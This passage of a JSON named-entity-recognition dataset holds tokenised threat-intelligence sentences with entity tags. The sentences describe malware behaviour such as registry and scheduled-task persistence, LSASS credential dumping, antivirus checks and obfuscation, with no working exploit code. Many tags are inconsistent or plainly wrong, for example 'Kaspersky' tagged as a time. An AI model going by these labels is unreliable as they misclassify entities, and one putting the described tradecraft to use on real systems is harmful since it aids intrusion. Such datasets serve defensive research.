"O", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "njRAT", "can", "search", "a", "list", "of", "running", "processes", "for", "Tr.exe." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "njRAT", "can", "read", "specific", "registry", "values." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "njRAT", "has", "added", "persistence", "via", "the", "Registry", "key", "<code>HKCU\\Software\\Microsoft\\CurrentVersion\\Run\\</code>", "and", "dropped", "a", "shortcut", "in", "<code>%STARTUP%</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "njRAT", "has", "a", "module", "for", "performing", "remote", "desktop", "access." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "njRAT", "can", "identify", "remote", "hosts", "on", "connected", "networks." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "njRAT", "can", "be", "configured", "to", "spread", "via", "removable", "drives." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "njRAT", "can", "capture", "screenshots", "of", "the", "victim’s", "machines." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "njRAT", "uses", "Base64", "encoding", "for", "C2", "traffic." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "njRAT", "enumerates", "the", "victim", "operating", "system", "and", "computer", "name", "during", "the", "initial", "infection." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "njRAT", "enumerates", "the", "current", "user", "during", "the", "initial", "infection." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "njRAT", "can", "access", "the", "victim's", "webcam." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "njRAT", "has", "used", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "njRAT", "can", "launch", "a", "command", "shell", "interface", "for", "executing", "commands." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "If", "an", "initial", "connectivity", "check", "fails,", "pngdowner", "attempts", "to", "extract", "proxy", "details", "and", "credentials", "from", "Windows", "Protected", "Storage", "and", "from", "the", "IE", "Credentials", "Store.", "This", "allows", "the", "adversary", "to", "use", "the", "proxy", "credentials", "for", "subsequent", "requests", "if", "they", "enable", "outbound", "HTTP", "access." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "pngdowner", "deletes", "content", "from", "C2", "communications", "that", "was", "saved", "to", "the", "user's", "temporary", "directory." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "pngdowner", "uses", "HTTP", "for", "command", "and", "control." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "pwdump", "can", "be", "used", "to", "dump", "credentials", "from", "the", "SAM." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "route", "can", "be", "used", "to", "discover", "routing", "configuration", "information." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "schtasks", "is", "used", "to", "schedule", "tasks", "on", "a", "Windows", "system", "to", "run", "at", "a", "specific", "date", "and", "time." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "spwebmember", "is", "used", "to", "enumerate", "and", "dump", "information", "from", "Microsoft", "SharePoint." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "sqlmap", "can", "be", "used", "to", "automate", "exploitation", "of", "SQL", "injection", "vulnerabilities." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "B-Features", "O", "B-Way", "I-Way", "O" ] }, { "tokens": [ "xCaon", "has", "added", "persistence", "via", "the", "Registry", "key", "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows", "NT\\CurrentVersion\\Windows\\load</code>", "which", "causes", "the", "malware", "to", "run", "each", "time", "any", "user", "logs", "in." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "xCaon", "has", "uploaded", "files", "from", "victims'", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "xCaon", "has", "decoded", "strings", "from", "the", "C2", "server", "before", "executing", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "xCaon", "has", "a", "command", "to", "download", "files", "to", "the", "victim's", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "xCaon", "has", "leveraged", "native", "OS", "function", "calls", "to", "retrieve", "victim's", "network", "adapter's", "information", "using", "GetAdapterInfo()", "API." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "xCaon", "has", "checked", "for", "the", "existence", "of", "Kaspersky", "antivirus", "software", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Time", "O", "O", "O", "O", "O" ] }, { "tokens": [ "xCaon", "has", "used", "Base64", "to", "encode", "its", "C2", "traffic." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "xCaon", "has", "encrypted", "data", "sent", "to", "the", "C2", "server", "using", "a", "XOR", "key." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "xCaon", "has", "used", "the", "GetAdaptersInfo()", "API", "call", "to", "get", "the", "victim's", "MAC", "address." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "xCaon", "has", "communicated", "with", "the", "C2", "server", "by", "sending", "POST", "requests", "over", "HTTP." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "xCaon", "has", "a", "command", "to", "start", "an", "interactive", "shell." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "xCmd", "can", "be", "used", "to", "execute", "binaries", "on", "remote", "systems", "by", "creating", "and", "starting", "a", "service." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "yty", "communicates", "to", "the", "C2", "server", "by", "retrieving", "a", "Google", "Doc." ], "ner_tags": [ "B-SamFile", "B-Features", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "yty", "contains", "junk", "code", "in", "its", "binary,", "likely", "to", "confuse", "malware", "analysts." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "yty", "collects", "files", "with", "the", "following", "extensions:", ".ppt,", ".pptx,", ".pdf,", ".doc,", ".docx,", ".xls,", ".xlsx,", ".docm,", ".rtf,", ".inp,", ".xlsm,", ".csv,", ".odt,", ".pps,", ".vcf", "and", "sends", "them", "back", "to", "the", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "yty", "gathers", "information", "on", "victim’s", "drives", "and", "has", "a", "plugin", "for", "document", "listing." ], "ner_tags": [ "B-SamFile", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "yty", "uses", "a", "keylogger", "plugin", "to", "gather", "keystrokes." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "B-Tool", "O", "I-Purp", "O" ] }, { "tokens": [ "yty", "gets", "an", "output", "of", "running", "processes", "using", "the", "<code>tasklist</code>", "command." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "yty", "uses", "the", "<code>net", "view</code>", "command", "for", "discovery." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "yty", "establishes", "persistence", "by", "creating", "a", "scheduled", "task", "with", "the", "command", "<code>SchTasks", "/Create", "/SC", "DAILY", "/TN", "BigData", "/TR", "“", "+", "path_file", "+", "“/ST", "09:30“</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "yty", "collects", "screenshots", "of", "the", "victim", "machine." ], "ner_tags": [ "B-SamFile", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "yty", "packs", "a", "plugin", "with", "UPX." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "yty", "has", "some", "basic", "anti-sandbox", "detection", "that", "tries", "to", "detect", "Virtual", "PC,", "Sandboxie,", "and", "VMware." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "yty", "gathers", "the", "computer", "name,", "the", "serial", "number", "of", "the", "main", "disk", "volume,", "CPU", "information,", "Microsoft", "Windows", "version,", "and", "runs", "the", "command", "<code>systeminfo</code>." ], "ner_tags": [ "B-SamFile", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "yty", "runs", "<code>ipconfig", "/all</code>", "and", "collects", "the", "domain", "name." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "yty", "collects", "the", "victim’s", "username." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O" ] }, { "tokens": [ "zwShell", "has", "deleted", "itself", "after", "creating", "a", "service", "as", "well", "as", "deleted", "a", "temporary", "file", "when", "the", "system", "reboots." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "zwShell", "can", "browse", "the", "file", "system." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "zwShell", "can", "modify", "the", "Registry." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O" ] }, { "tokens": [ "zwShell", "has", "used", "RDP", "for", "lateral", "movement." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "zwShell", "has", "been", "copied", "over", "network", "shares", "to", "move", "laterally." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "zwShell", "has", "used", "SchTasks", "for", "execution." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "zwShell", "can", "obtain", "the", "victim", "PC", "name", "and", "OS", "version." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "zwShell", "can", "obtain", "the", "victim", "IP", "address." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "zwShell", "can", "obtain", "the", "name", "of", "the", "logged-in", "user", "on", "the", "victim." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "zwShell", "can", "launch", "command-line", "shells." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "zwShell", "has", "established", "persistence", "by", "adding", "itself", "as", "a", "new", "service." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "This", "file", "extracts", "credentials", "from", "LSASS", "similar", "to", "Mimikatz." ], "ner_tags": [ "O", "O", "B-Features", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "It", "calls", "OpenProcess", "on", "lsass.exe", "with", "access", "flag", "set", "to", "VM_READ,", "and", "looks", "for", "the", "modules", "wdigest.dll", "and", "lsasrv.dll", "loaded", "in", "the", "lsass.exe", "process." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "It", "spreads", "to", "Microsoft", "Windows", "machines", "using", "several", "propagation", "methods,", "including", "the", "EternalBlue", "exploit", "for", "the", "CVE-2017-0144", "vulnerability", "in", "the", "SMB", "service." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "B-Exp", "O", "O", "B-Features", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "SMB", "exploitation", "via", "EternalBlue" ], "ner_tags": [ "B-Way", "O", "O", "B-Features" ] }, { "tokens": [ "SMBv1", "Exploitation", "via", "EternalBlue" ], "ner_tags": [ "B-Features", "O", "O", "B-Features" ] }, { "tokens": [ "has", "the", "capability", "to", "exploit", "SMBv1", "via", "the", "well", "known", "EternalBlue", "exploit." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "B-Features", "B-Exp" ] }, { "tokens": [ "SMB", "copy", "and", "remote", "execution" ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "This", "thread", "is", "then", "used", "to", "execute", "the", "SMB", "copy", "and", "remote", "execution" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "SMB", "copy", "and", "remote", "execution" ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "SMB", "Copy", "and", "Remote", "Execution" ], "ner_tags": [ "B-Way", "B-Tool", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "The", "malware", "decompresses", "its", "resource", "named" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "malware", "decompresses", "a", "resource" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "is", "used", "as", "an", "integrity", "check", "for", "the", "decryption", "process." ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "decrypt", "the", "MFT," ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "the", "code", "attempts", "to", "decrypt", "the", "contents" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Once", "the", "sector", "is", "decrypted," ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "and", "the", "same", "key", "is", "used", "to", "decrypt", "the", "MFT." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "is", "also", "decoded,", "and", "placed", "back" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "its", "resource", "section", "are", "decompressed", "and", "written", "to", "disk" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "malware", "is", "a", "DLL", "that", "is", "launched", "using", "rundll32.exe:" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "being", "invoked", "by", "rundll32.exe." ], "ner_tags": [ "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Command", "Line", "Execution" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Once", "the", "command", "line", "arguments", "are", "generated" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "malware", "also", "spawns", "cmd.exe", "to", "execute", "the", "following", "command" ], "ner_tags": [ "O", "B-SamFile", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "that", "hashes", "each", "running", "process", "on", "the", "system" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Process", "Hashes", "and", "Process", "Privilege", "Checks" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "track", "which", "of", "the", "3", "processes", "are", "running", "on", "the", "system." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "compares", "each", "hash", "with", "3", "hardcoded", "hashes:", "0x6403527E", "→", "avp.exe", "associated", "with", "Kaspersky", "AV", "0x23214B44", "→", "ns.exe", "associated", "with", "Norton", "Security", "0x651B3005", "→", "ccSvcHst.exe", "associated", "with", "Symantec" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "B-Time", "O", "O", "O", "B-SamFile", "O", "O", "I-SecTeam", "I-SecTeam", "O", "O", "B-SamFile", "O", "O", "B-Time" ] }, { "tokens": [ "using", "the", "API", "NtRaiseHardError" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "invokes", "the", "following", "API’s:" ], "ner_tags": [ "O", "O", "O", "B-Idus" ] }, { "tokens": [ "GetExtendedTcpTable", "to", "retrieve", "a", "list", "of", "TCP", "endpoints", "GetIpNetTable", "to", "retrieve" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NetServerEnum", "to", "get", "a", "list" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "NetServerGetInfoto", "retrieve", "the", "current", "configuration" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "CreateFile", "and", "WriteFile", "are", "used" ], "ner_tags": [ "B-SamFile", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "CreateProcessAsUser", "or", "CreateProcess", "is", "executed," ], "ner_tags": [ "B-SamFile", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "is", "created", "using", "the", "same", "API", "call;" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Calls", "CryptEncrypt" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "it", "also", "invokes", "the", "API", "NTRaiseHardError." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "undocumented", "Windows", "API", "that", "causes" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "If", "the", "API", "fails", "to", "execute,", "the", "malware", "calls", "InitiateSystemShutdownExW" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "NetServerGetInfoto", "retrieve", "the", "current", "configuration", "for", "the", "local", "server" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Obtains", "the", "IP", "address", "from", "the", "ClientIpAddress", "field" ], "ner_tags": [ "B-SamFile", "I-Purp", "I-Purp", "O", "O", "O", "O", "O" ] }, { "tokens": [ "There", "are", "two", "approaches", "to", "using", "valid", "credentials", "to", "copy", "and", "execute", "the", "malware", "to", "a", "remote", "host:" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "is", "used", "to", "connect", "to", "a", "server", "using", "the", "default", "credentials" ], "ner_tags": [ "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "WMIC" ], "ner_tags": [ "B-Time" ] }, { "tokens": [ "C:\\Windows\\system32\\wbem\\wmic.exe", "/node" ], "ner_tags": [ "B-SamFile", "O" ] }, { "tokens": [ "encodes", "it", "using", "XOR", "encoding", "with", "key" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "contains", "the", "original", "MBR", "that", "was", "encoded", "by", "XORing" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "which", "were", "previously", "encrypted" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "the", "original", "encoded", "MBR" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "obtain", "keystrokes,", "and", "status", "of", "keyboard", "buffer" ], "ner_tags": [ "I-Features", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "malware", "only", "targets", "fixed", "drives", "on", "the", "system." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "malware", "will", "first", "start", "enumerating", "files", "in", "the", "directory", "it", "is", "being", "executed", "from." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "scheduled", "task", "is", "set", "to", "trigger", "60", "minutes", "after", "the", "malware", "execution", "by", "default." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "scheduled", "task", "will", "trigger", "30", "minutes", "after", "the", "malware", "execution." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Explanation", "of", "schtask", "parameters" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "taskrun.", "Path", "and", "filename", "of", "the", "task", "to", "be", "run" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "instance,", "immediately", "after", "execution,", "it", "loads", "itself", "in", "memory,", "and", "deletes", "itself", "from", "the", "disk." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Features", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "delete", "important", "files" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "the", "configuration", "file", "will", "be", "deleted" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "threat", "actors", "use", "Themida", "packer", "to", "obfuscate", "the", "signature", "used", "for", "detection." ], "ner_tags": [ "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "packed", "by", "noted", "tools" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Themida-packed" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "upload/download", "file" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "remote", "shell", "functions." ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "It", "supports", "proxy", "(Socks5)," ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "with", "SOCKS", "v5", "server" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "used", "to", "dump", "information", "from", "the", "victim’s", "Oracle", "database." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "an", "information", "stealer", "used", "to", "harvest", "internal", "information." ], "ner_tags": [ "O", "I-SamFile", "B-SecTeam", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Obfuscated", "PowerShell", "script" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "multi-layer", "obfuscation" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "to", "obfuscate", "their", "tools" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "have", "adopted", "more", "obfuscation", "techniques" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Heavily", "obfuscated", "PowerShell", "script" ], "ner_tags": [ "O", "O", "B-Way", "O" ] }, { "tokens": [ "the", "encrypted", "payload" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "the", "encrypted", "payload" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "to", "obfuscate", "control", "flow", "of", "program." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Heavy", "obfuscation", "in", "a", "simple", "but", "useful", "anti-analysis", "approach", "makes", "it", "difficult", "for", "security", "products", "to", "detect", "their", "scripts." ], "ner_tags": [ "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "threat", "actors", "use", "multi-layered", "AES", "encryption", "and", "base64", "encoding", "to", "obfuscate" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "obfuscate", "the", "execution", "flow", "of", "the", "program" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "decryption", "algorithm" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "decrypted", "with", "RC4", "algorithm" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "usage", "of", "a", "highly", "similar", "decryption", "algorithm" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "decrypt", "the", "payload" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "decrypt", "it" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "the", "decryption", "function", "into", "RC4" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "they", "always", "have", "used", "DLL", "sideloading", "as", "their", "major", "technique", "to", "launch", "their", "malware." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "adopted", "DLL", "sideloading", "techniques", "to", "run", "their", "malware." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "used", "DLL", "sideloading", "to", "launch", "their", "malware" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "malicious", "DLL", "“gtn.dll”,", "which", "we", "named", "as", "“ShellFang”,", "loads", "when", "a", "legitimate", "executable", "is", "launched." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "including", "API", "hashing", "and", "execution", "flow", "obfuscation", "through", "exception", "mechanism" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Windows", "APIs", "are", "obfuscated", "via", "a", "hashing", "function", "and", "dynamically", "resolved", "in", "the", "run-time." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Necessary", "APIs", "will", "be", "dynamically", "resolved", "during", "execution." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "API", "obfuscation,", "and", "execution", "flow", "obfuscation" ], "ner_tags": [ "B-Exp", "B-Exp", "O", "O", "O", "O" ] }, { "tokens": [ "abusing", "exception", "mechanisms", "to", "obfuscate", "the", "execution", "flow", "of", "programs", "and", "Windows", "API", "hashing." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "final", "payload", "is", "an", "HTTPs", "Cobalt", "Strike", "beacon." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "by", "creating", "immediate", "tasks", "through", "GPO." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "abused", "group", "policy", "objects", "(GPO)", "to", "install", "loaders" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Propagation", "through", "GPO" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "they", "will", "submit", "immediate", "tasks", "to", "the", "hosts", "in", "the", "domain", "through", "GPO" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "As", "the", "hosts", 